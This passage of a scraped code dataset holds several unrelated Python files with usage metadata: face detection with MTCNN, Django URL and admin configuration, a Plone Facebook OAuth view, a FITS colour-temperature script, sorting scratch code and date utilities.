433, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 433, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 433, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 436, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 440, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 440, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 441, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_max", "line_number": 442, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 444, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 444, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 445, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 449, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 449, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 450, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 450, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 451, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 451, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 451, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 452, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 452, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 453, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 453, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 454, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 454, "usage_type": "call"}, {"api_name": "tensorflow.logging.info", "line_number": 472, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 472, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 474, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 474, "usage_type": 
"attribute"}, {"api_name": "tensorflow.estimator", "line_number": 479, "usage_type": "attribute"}, {"api_name": "tensorflow.trainable_variables", "line_number": 484, "usage_type": "call"}, {"api_name": "bert.modeling.get_assignment_map_from_checkpoint", "line_number": 489, "usage_type": "call"}, {"api_name": "bert.modeling", "line_number": 489, "usage_type": "name"}, {"api_name": "tensorflow.train.init_from_checkpoint", "line_number": 493, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Scaffold", "line_number": 494, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tensorflow.train.init_from_checkpoint", "line_number": 498, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 500, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 500, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 506, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 506, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 509, "usage_type": "attribute"}, {"api_name": "bert.optimization.create_optimizer", "line_number": 510, "usage_type": "call"}, {"api_name": "bert.optimization", "line_number": 510, "usage_type": "name"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 511, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 511, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator", "line_number": 516, "usage_type": "attribute"}, {"api_name": "tensorflow.metrics.accuracy", "line_number": 519, "usage_type": "call"}, {"api_name": "tensorflow.metrics", "line_number": 519, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 528, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 528, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimatorSpec", "line_number": 534, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 534, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 553, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 553, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 555, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 555, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 556, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 556, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 557, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 557, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 559, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 560, "usage_type": "attribute"}, 
{"api_name": "tensorflow.cast", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 561, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 562, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 563, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 570, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 571, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 572, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 572, "usage_type": "attribute"}, {"api_name": "tensorflow.estimator.export.build_raw_serving_input_receiver_fn", "line_number": 575, "usage_type": "call"}, {"api_name": "tensorflow.estimator", "line_number": 575, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path", "line_number": 614, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 615, "usage_type": "call"}, {"api_name": "os.path", "line_number": 615, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 616, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 619, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 625, "usage_type": "call"}, {"api_name": "tensorflow.logging.set_verbosity", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 632, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 634, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 634, "usage_type": "attribute"}, {"api_name": "bert.modeling.BertConfig.from_json_file", "line_number": 636, "usage_type": "call"}, {"api_name": "bert.modeling.BertConfig", "line_number": 636, "usage_type": "attribute"}, {"api_name": "bert.modeling", "line_number": 636, "usage_type": "name"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 642, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 642, "usage_type": "attribute"}, {"api_name": "bert.tokenization.validate_case_matches_checkpoint", "line_number": 644, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 644, "usage_type": "name"}, {"api_name": "bert.tokenization.FullTokenizer", "line_number": 645, "usage_type": "call"}, {"api_name": "bert.tokenization", "line_number": 645, "usage_type": "name"}, {"api_name": "tensorflow.contrib.cluster_resolver.TPUClusterResolver", "line_number": 662, "usage_type": "call"}, {"api_name": "tensorflow.contrib", 
"line_number": 662, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib", "line_number": 665, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.RunConfig", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 666, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUConfig", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 671, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.tpu.TPUEstimator", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 686, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 696, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 696, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 697, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 697, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 698, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 698, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 699, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 699, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 717, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 717, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 718, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 718, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 719, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 719, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 737, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 737, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 738, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 738, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 742, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 742, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 743, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 743, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 744, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 744, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 775, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 776, "usage_type": "call"}, {"api_name": "os.path", "line_number": 776, "usage_type": "attribute"}, {"api_name": "tensorflow.logging.info", "line_number": 780, "usage_type": "call"}, {"api_name": "tensorflow.logging", "line_number": 780, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 781, "usage_type": "attribute"}, {"api_name": "tensorflow.app.run", "line_number": 791, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 791, "usage_type": "attribute"}]} {"seq_id": "140256192", "text": "from mtcnn.mtcnn import MTCNN\n\nclass mtcnn_to_face_alignment:\n def __init__(self):\n self.detector = MTCNN()\n\n def find_bboxes(self, input_img):\n \"\"\"\n 
Receive: an image\n\n Return: a list of bboxes in format (x1, y1, x2, y2)\n \"\"\"\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) plus a confidence score, which we do not use\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n\n def size_of_bbox(self, bbox):\n \"\"\"\n return:\n multiplication of width x height\n \"\"\"\n return bbox[2]*bbox[3]\n #TODO: finish\n def mtcnn_bbox_face_alignment_format_a(self, input_img):\n \"\"\"\n Receive: an image\n\n Return: the biggest bbox in format (x1, y1, x2, y2)\n \"\"\"\n max_size_box = 0\n size_box = 0\n bbox_to_return = None\n faces_positions = self.detector.detect_faces(input_img)\n #format: (x1, y1, w, h) plus a confidence score, which we do not use\n bbox_list = []\n if (len(faces_positions)!=0):\n for face in faces_positions:\n bbox = face['box']\n size_box = self.size_of_bbox(bbox)\n if (size_box > max_size_box):\n max_size_box = size_box\n bbox_to_return = bbox\n ###TODO: finish returning the bbox in the new format\n bbox = bbox_to_return\n bbox_formated = [[bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]]]\n bbox_list.append(bbox_formated)\n return bbox_list\n", "sub_path": "mtcnn_to_face_alignment.py", "file_name": "mtcnn_to_face_alignment.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "mtcnn.mtcnn.MTCNN", "line_number": 5, "usage_type": "call"}]} {"seq_id": "244321045", "text": "from django.conf.urls import patterns, include, url\nfrom settings import APP_ROOT\n\nurlpatterns = patterns('',\n url(r'^$', 'register_users.views.home', name='home'),\n\n url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'static/'}),\n\n url(r'^uploads/(?P<path>.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/'}),\n\n url(r'^media/img/(?P<path>.*)$', 'django.views.static.serve', {'document_root': APP_ROOT+'uploads/photos/'}, name='images_link'),\n\n url(r'^accounts/', include('register_users.urls')),\n\n url(r'^msg/', include('private_message.urls')),\n\n url(r'^friend/', include('friends_app.urls')),\n\n url(r'^media/', include('media_app.urls')),\n\n url(r'^music/', include('music_app.urls')),\n\n url(r'^settings/', include('settings_app.urls')),\n\n url(r'^find/', include('find_app.urls'))\n)\n", "sub_path": "djangoproj/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "settings.APP_ROOT", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, 
{"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 25, "usage_type": "call"}]} {"seq_id": "552792675", "text": "from django.contrib import admin\nfrom tpo.app.models import UserProfile, Company\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n fields = ('name', 'username', 'email',)\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ('name', 'tpr__name', 'tpr__email', 'tpr__username')\n list_display = ('name', 'tpr',)\n list_filter = ('type_of_company',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\nadmin.site.register(Company, CompanyAdmin)\n", "sub_path": "tpo/app/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 15, "usage_type": "call"}, {"api_name": "tpo.app.models.UserProfile", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 16, "usage_type": "call"}, {"api_name": "tpo.app.models.Company", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}]} {"seq_id": "99246420", "text": "# coding: utf-8\n\nimport urllib2\nimport urllib\nimport urlparse\nfrom zope.component import getUtility\nfrom plone.registry.interfaces import IRegistry\nfrom collective.socialpublish.controlpanel.interfaces import ISocialPublishControlPanel\nfrom Products.Five.browser import BrowserView\n#from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nfrom collective.socialpublish.events import get_page_list\nfrom collective.socialpublish.controlpanel.utils import fb_page_info_list_to_str\n\nENDPOINT = 'graph.facebook.com'\n\ndef get_url(path, args=None):\n args = args or {}\n #if ACCESS_TOKEN:\n # args['access_token'] = ACCESS_TOKEN\n if 'access_token' in args or 'client_secret' in args:\n endpoint = \"https://\" + ENDPOINT\n else:\n endpoint = 
\"http://\" + ENDPOINT\n return endpoint + path + '?' + urllib.urlencode(args)\n\ndef get_resource(path, args=None):\n return urllib2.urlopen(get_url(path, args=args)).read()\n\n\nclass FacebookAuth(BrowserView):\n \"\"\"\n\n \"\"\"\n #template = ViewPageTemplateFile('')\n\n def __call__(self):\n portal_messages = IStatusMessage(self.request)\n portal_url = getToolByName(self.context, 'portal_url')()\n here_url = portal_url + \"/@@facebook-auth\"\n registry = getUtility(IRegistry)\n settings = registry.forInterface(ISocialPublishControlPanel)\n fb_app_id = settings.fb_app_id\n fb_app_secret = settings.fb_app_secret\n\n code = self.request.form.get('code')\n if code is None:\n portal_messages.add(u\"Illegal access: no 'code' parameter supplied\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n token_res = get_resource('/oauth/access_token', {'client_id': fb_app_id,\n 'redirect_uri': here_url,\n 'client_secret': fb_app_secret,\n 'code': code})\n fb_access_token = urlparse.parse_qs(token_res).get('access_token')\n try:\n fb_access_token_unicode = unicode(fb_access_token[0], 'utf-8')\n except (IndexError, TypeError): # parse_qs returns None when the token is missing\n portal_messages.add(u\"Couldn't get Facebook token\", type=u\"error\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n settings.fb_access_token = fb_access_token_unicode\n\n page_info_list = get_page_list(fb_access_token_unicode)\n settings.fb_page_info = fb_page_info_list_to_str(page_info_list)\n\n portal_messages.add(u\"Getting Facebook page information\", type=u\"info\")\n return self.request.RESPONSE.redirect(\"@@socialpublish-settings\")\n\n", "sub_path": "collective/socialpublish/facebook_auth/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 2780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "urllib.urlencode", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "Products.Five.browser.BrowserView", "line_number": 33, "usage_type": "name"}, {"api_name": "Products.statusmessages.interfaces.IStatusMessage", "line_number": 40, "usage_type": "call"}, {"api_name": "Products.CMFCore.utils.getToolByName", "line_number": 41, "usage_type": "call"}, {"api_name": "zope.component.getUtility", "line_number": 43, "usage_type": "call"}, {"api_name": "plone.registry.interfaces.IRegistry", "line_number": 43, "usage_type": "argument"}, {"api_name": "collective.socialpublish.controlpanel.interfaces.ISocialPublishControlPanel", "line_number": 44, "usage_type": "argument"}, {"api_name": "urlparse.parse_qs", "line_number": 56, "usage_type": "call"}, {"api_name": "collective.socialpublish.events.get_page_list", "line_number": 64, "usage_type": "call"}, {"api_name": "collective.socialpublish.controlpanel.utils.fb_page_info_list_to_str", "line_number": 65, "usage_type": "call"}]} {"seq_id": "291641998", "text": "import pyfits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\nfrom astropy.io import fits\n\ndata1 = pyfits.getdata('4imAF.fits') \ndata2 = pyfits.getdata('3imAF.fits')\n\n#set a noise floor for the image. 
Poor SNR pixels will give you bad temperature measurements.\nfloor1 = 0.045\nfloor2 = 0.070\n\n\n#set low SNR pixels to nans\nav1 = np.where(data1 < floor1)\ndata1[av1] = np.nan\n\n#set low SNR pixels to nans\nav2 = np.where(data2 < floor2)\ndata2[av2] = np.nan\n\n#Color temperatures\n\n#extinction factor for the images (provided by Matt)\nbg1 = 2.58\nbg2 = 1.54\n\n#Bg from Fit3.py code, aka. fitting the histogram\n #I_1Bg = Band 3 background Intensity\n #I_2Bg = Band 4 background Intensity\nI_1Bg = 325\nI_2Bg = 1261\n\n#wavelengths of first image in cm for cgs\nl1 = 12e-4\nl2 = 22e-4\n\n#set constants (in cgs)\nc = 3e10\nh = 6.626e-27\nc = 2.9979e10\nkb = 1.38e-16\n\n#convert wavelengths of images to frequencies\nv1 = c / l1\nv2 = c / l2\n\n#define function for b_nu that we will solve for T\nfunc = lambda T : (v1/v2)**5*(np.expm1((h*v2)/(kb*T)))/(np.expm1((h*v1)/(kb*T)))-I_1/I_2\n\n#provide an initial guess for T for the solver to use. \nTinit = 100.0\n\n#get the shape of the images so we know how big to make the for loop\nshp = np.shape(data1)\n\n#create a new empty array to store the temperature values\nTim = np.zeros((shp[0],shp[1]))\n\nfor i in range (0,shp[0]):\n for j in range (0,shp[1]):\n\n #store the pixel values from the images\n I_1 = data1[i,j]\n I_2 = data2[i,j]\n \n #apply the extinction factors\n I_1 = I_1*bg1\n I_2 = I_2*bg2\n \n #use the solver to find the temperatures\n TS = fsolve(func,Tinit)\n \n #store the values in the array\n Tim[i,j] = TS\n\n#Where the solver returned Tinit, turn into a nan. \nTim[Tim == Tinit] = np.nan\n\n#Creating a new array\nhdu = fits.PrimaryHDU(Tim)\nhdulist = fits.HDUList([hdu])\nhdulist.writeto('1_ColorTempAF_5.fits')\n\n#plot the color temperature map\nplt.figure()\nplt.title('Color-Tempature Map')\nplt.imshow(Tim[::-1])\n#plt.clim(lowval, highval)\nplt.colorbar()\nplt.show()\n\n\n\n#fits.writeto('out.fits', data, header)\n", "sub_path": "Code3.py", "file_name": "Code3.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pyfits.getdata", "line_number": 7, "usage_type": "call"}, {"api_name": "pyfits.getdata", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.expm1", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 79, "usage_type": "attribute"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 82, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 82, "usage_type": "name"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 83, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} {"seq_id": "281666533", "text": "# def bubble_sort(l):\n# length = len(l)\n# for i in range(length):\n# try:\n# for j in range(length-i):\n# if l[j] > l[j+1]:\n# tmp = l[j+1]\n# l[j+1] = l[j]\n# l[j] = tmp\n# except IndexError:\n# pass\n#\n# return l\n\n#变量其实是地址 # 101011100111101011 #逻辑地址 -->物理地址 01111110001100\nimport datetime\n\ndef get_time():\n return datetime.time()\n\ndef f2():\n now = get_time()\n\ndef select_sort(l):\n\n now = get_time()\n\n length = len(l)\n for i in range(length):\n little = l[i]\n min_index = i+1\n for j in range(i+1,length):\n if l[j] < l[min_index]:\n min_index = j\n try:\n if l[min_index] < little:\n tmp = little\n l[i] = l[min_index]\n l[min_index] = tmp\n except IndexError:\n pass\n\n return l\n\n\n\n\n\n\n\na1 = [1,2,10,3,4,5,9,56,6,7,134,9]\n\n# print(select_sort(a1))\n\n\ndef muti_seli():\n sql = 'select 1;'\n sql2 = 'select 2;'\n\n\nx = None\nx12 = 'None'\n\n\nstr1 = \"\\\\r\"\n\nprint(str1)\n\nprint('-------')", "sub_path": "rimi_linux_mysql/speach/bubble.py", "file_name": "bubble.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "datetime.time", "line_number": 19, "usage_type": "call"}]} {"seq_id": "75872116", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/breno/Envs/djangoplus/lib/python3.7/site-packages/djangoplus/utils/dateutils.py\n# Compiled at: 2019-04-13 18:22:56\n# Size of source mod 2**32: 2346 bytes\nimport datetime, calendar\nDAY_NAMES = [calendar.day_name[i].capitalize().split()[0] for i in range(0, 7)]\nDAY_INITIALS = [calendar.day_name[i][0:3].capitalize() for i in range(0, 7)]\nMONTH_NAMES = [calendar.month_name[i].capitalize() for i in range(1, 13)]\nMONTH_INITIALS = [calendar.month_name[i][0:3].capitalize() for i in range(1, 13)]\nDAY_NAMES_CHOICES = [[x, x] for x in DAY_NAMES]\nDAY_INITIALS_CHOICES = [[x, x] for x in DAY_INITIALS]\nMONTH_NAMES_CHOICES = [[x, x] for x in MONTH_NAMES]\nMONTH_INITIALS_CHOICES = [[x, x] for x in MONTH_INITIALS]\n\ndef calculate_age(birthday):\n today = datetime.date.today()\n return today.year - birthday.year - ((today.month, today.day) < (birthday.month, birthday.day))\n\n\ndef numer_of_days(start, end):\n delta = end - start\n return delta.days\n\n\ndef parse_date(date_string):\n if len(date_string) == 10:\n fmt = '%d/%m/%Y'\n else:\n fmt = '%d/%m/%Y %H:%M:%S'\n return datetime.datetime.strptime(date_string, fmt)\n\n\ndef add_months(sourcedate, months):\n month = sourcedate.month - 1 + months\n year = int(sourcedate.year + month / 12)\n month = month % 12 + 1\n day = min(sourcedate.day, calendar.monthrange(year, month)[1])\n return datetime.date(year, month, day)\n\n\ndef add_days(sourcedate, days):\n sourcedate = sourcedate or datetime.date.today()\n return sourcedate + datetime.timedelta(days=days)\n\n\ndef future(days):\n return datetime.date.today() + datetime.timedelta(days=days)\n\n\ndef 
